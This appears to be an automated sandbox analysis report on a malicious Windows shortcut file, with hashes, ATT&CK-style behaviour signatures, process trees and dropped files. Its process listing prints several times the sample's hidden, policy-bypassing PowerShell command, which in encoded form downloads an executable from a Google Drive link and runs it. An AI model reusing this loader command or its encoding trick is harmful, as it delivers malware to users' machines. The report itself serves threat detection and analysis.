Analysis
-
max time kernel
139s -
max time network
160s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
11-05-2024 11:54
Static task
static1
Behavioral task
behavioral1
Sample
34759a7b254af5d435a747330e172602_JaffaCakes118.lnk
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
34759a7b254af5d435a747330e172602_JaffaCakes118.lnk
Resource
win10v2004-20240226-en
General
-
Target
34759a7b254af5d435a747330e172602_JaffaCakes118.lnk
-
Size
3KB
-
MD5
34759a7b254af5d435a747330e172602
-
SHA1
d0d2d2abc845103bc0655fd6fcc74adc332d34f5
-
SHA256
f79b3fb8b11748b9b8a68c316c805366e05f34b9c2bf41814191d03df53522ed
-
SHA512
4662b3e3f21ef000f569acb096f697e074b4425df67c3d3b34611cc65873cd02f17cf80edf5ba2a3b3287bd16e268d262f2f7706de5c275afbffc587e7b5bd72
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1SCyn_ZPahvp66p8IWBybgyebqvi_tKj8
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 7 2468 powershell.exe 10 2468 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepid process 4700 powershell.exe 2468 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation cmd.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepid process 4700 powershell.exe 4700 powershell.exe 2468 powershell.exe 2468 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 4700 powershell.exe Token: SeDebugPrivilege 2468 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.exepowershell.execmd.exedescription pid process target process PID 3040 wrote to memory of 4700 3040 cmd.exe powershell.exe PID 3040 wrote to memory of 4700 3040 cmd.exe powershell.exe PID 4700 wrote to memory of 3504 4700 powershell.exe cmd.exe PID 4700 wrote to memory of 3504 4700 powershell.exe cmd.exe PID 3504 wrote to memory of 2468 3504 cmd.exe powershell.exe PID 3504 wrote to memory of 2468 3504 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\34759a7b254af5d435a747330e172602_JaffaCakes118.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmd /c pOWersHELL.exe -Ex bypasS -W hiddeN -Ec CQAMAAkAKAAJACAACQBOAEUAdwAtAG8AQgBqAGUAQwB0AAkACwAgAHMAeQBTAFQARQBtAC4ATgBlAHQALgB3AGUAQgBDAEwAaQBFAG4AVAAJAAkAIAApAC4ARABvAFcATgBMAE8AYQBEAEYASQBMAEUAKAAgAAkAIAAdIGgAdAB0AHAAcwA6AC8ALwBkAHIAaQB2AGUALgBnAG8AbwBnAGwAZQAuAGMAbwBtAC8AdQBjAD8AZQB4AHAAbwByAHQAPQBkAG8AdwBuAGwAbwBhAGQAJgBpAGQAPQAxAFMAQwB5AG4AXwBaAFAAYQBoAHYAcAA2ADYAcAA4AEkAVwBCAHkAYgBnAHkAZQBiAHEAdgBpAF8AdABLAGoAOAAdIAkACwAgACwAIAALACAAHSAkAEUAbgB2ADoAVABlAG0AcABcAHAAZABmAHIAcgB0AC4AZQB4AGUAHSAgAAkAIAApAAkACQAJADsAIAAJAAkASQBuAFYAbwBLAGUALQBJAFQAZQBNACAAIAAgAB0gJABFAE4AVgA6AHQARQBtAHAAXABwAGQAZgByAHIAdAAuAGUAeABlAB0g2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c pOWersHELL.exe -Ex bypasS -W hiddeN -Ec CQAMAAkAKAAJACAACQBOAEUAdwAtAG8AQgBqAGUAQwB0AAkACwAgAHMAeQBTAFQARQBtAC4ATgBlAHQALgB3AGUAQgBDAEwAaQBFAG4AVAAJAAkAIAApAC4ARABvAFcATgBMAE8AYQBEAEYASQBMAEUAKAAgAAkAIAAdIGgAdAB0AHAAcwA6AC8ALwBkAHIAaQB2AGUALgBnAG8AbwBnAGwAZQAuAGMAbwBtAC8AdQBjAD8AZQB4AHAAbwByAHQAPQBkAG8AdwBuAGwAbwBhAGQAJgBpAGQAPQAxAFMAQwB5AG4AXwBaAFAAYQBoAHYAcAA2ADYAcAA4AEkAVwBCAHkAYgBnAHkAZQBiAHEAdgBpAF8AdABLAGoAOAAdIAkACwAgACwAIAALACAAHSAkAEUAbgB2ADoAVABlAG0AcABcAHAAZABmAHIAcgB0AC4AZQB4AGUAHSAgAAkAIAApAAkACQAJADsAIAAJAAkASQBuAFYAbwBLAGUALQBJAFQAZQBNACAAIAAgAB0gJABFAE4AVgA6AHQARQBtAHAAXABwAGQAZgByAHIAdAAuAGUAeABlAB0g3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepOWersHELL.exe -Ex bypasS -W hiddeN -Ec CQAMAAkAKAAJACAACQBOAEUAdwAtAG8AQgBqAGUAQwB0AAkACwAgAHMAeQBTAFQARQBtAC4ATgBlAHQALgB3AGUAQgBDAEwAaQBFAG4AVAAJAAkAIAApAC4ARABvAFcATgBMAE8AYQBEAEYASQBMAEUAKAAgAAkAIAAdIGgAdAB0AHAAcwA6AC8ALwBkAHIAaQB2AGUALgBnAG8AbwBnAGwAZQAuAGMAbwBtAC8AdQBjAD8AZQB4AHAAbwByAHQAPQBkAG8AdwBuAGwAbwBhAGQAJgBpAGQAPQAxAFMAQwB5AG4AXwBaAFAAYQBoAHYAcAA2ADYAcAA4AEkAVwBCAHkAYgBnAHkAZQBiAHEAdgBpAF8AdABLAGoAOAAdIAkACwAgACwAIAALACAAHSAkAEUAbgB2ADoAVABlAG0AcABcAHAAZABmAHIAcgB0AC4AZQB4AGUAHSAgAAkAIAApAAkACQAJADsAIAAJAAkASQBuAFYAbwBLAGUALQBJAFQAZQBNACAAIAAgAB0gJABFAE4AVgA6AHQARQBtAHAAXABwAGQAZgByAHIAdAAuAGUAeABlAB0g4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3716 --field-trial-handle=2280,i,1836084024518340990,18250262151825427757,262144 --variations-seed-version /prefetch:81⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD523909774a4f0358be8e03226d73fbd61
SHA14df262994ce4eb3935965881c1e2dc730668da94
SHA2566dbd177f5aa34f836bf52885c04a3a93771384ebad954911be812c039290bcad
SHA5126ed0bfd0a498043cccf9ef2d9bebc869c4f5f2befc90636e2e3167b2d0b694c538f93aaeefe221bc08ca3962c6499f402df4934444c9f82883d3314075d5f05b
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_khhcljel.s12.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/4700-2-0x00007FFD84573000-0x00007FFD84575000-memory.dmpFilesize
8KB
-
memory/4700-12-0x0000014571520000-0x0000014571542000-memory.dmpFilesize
136KB
-
memory/4700-13-0x00007FFD84570000-0x00007FFD85031000-memory.dmpFilesize
10.8MB
-
memory/4700-14-0x00007FFD84570000-0x00007FFD85031000-memory.dmpFilesize
10.8MB
-
memory/4700-15-0x00007FFD84570000-0x00007FFD85031000-memory.dmpFilesize
10.8MB
-
memory/4700-30-0x00007FFD84570000-0x00007FFD85031000-memory.dmpFilesize
10.8MB